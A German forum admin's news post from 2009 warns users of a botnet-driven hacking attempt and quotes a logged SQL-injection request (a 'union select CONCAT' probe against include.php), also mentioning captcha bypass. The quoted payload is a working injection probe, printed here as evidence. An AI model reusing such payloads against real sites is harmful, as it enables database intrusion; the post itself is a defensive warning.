14.05.2009 - 15:54 von DaZ

Es ist mal wieder soweit. Anscheinend scheint ein neues Script herausgekommen zu sein . Mal sehen was demnächst noch so hier passieren wird. Vorsichtshalber hab ich den kompletten Webspace mal gebackupt und die Datenbank gesichert. Wenn irgendjemanden hier komische Vorgänge auffallen, so bitte ich umgehends um Rückmeldung.

Danke euer Admin !

Details zum Hackversuch:

Es handelt sich dabei um eine SQL-Injection. So weit ich in Erfahrung gebracht habe, richten sich die Attacken hauptsächlich gegen MS SQL Server. Weiterhin wird es von einem Botnet gesteuert. Zum einen wird Versucht den Captchacode zu umgehen (indem man das Bild extern auswertet) und andererseits werden Schwachstellen in der Datenbank gesucht. Dies geschieht durch anhängen von Informationen an die Url

Zitat
GET /kit/include.php?threadid=534&postid=new&path=forumsthread'%20and%201=2%20union%20select%20CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT
(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20and%20'1"


oder durch Ausnutzen von Schwachstellen in der Abfrage von Formularfeldern.
Vermutlich stammt das Botnetz aus Russland und versucht massenhaft Spam zu verteilen, um so dubiose Produkte wie Viagratabletten & Co zu vertreiben.

nähere Informationen zum Bot könnt ihr hier nachlesen

:momed:

Newsarchiv

 Login

Kommentare sind nur registrierten Benutzern gestattet. Bitte loggen Sie sich ein!

Noch nicht angemeldet? Klicken Sie bitte hier!

Benutzername
Passwort
Login speichern

Status

  • Heute:788
    Gestern:392
    Differenz:396
    Gesamt:1.272.223
  • Benutzer & Gäste

    28 Benutzer registriert, davon online: 67 Gäste

Kalender

  • M D M D F S S
      1
    2 3 4 5 6 7 8
    9 10 11 12 13 14 15
    16 17 18 19 20 21 22
    23 24 25 26 27 28 29
    30 31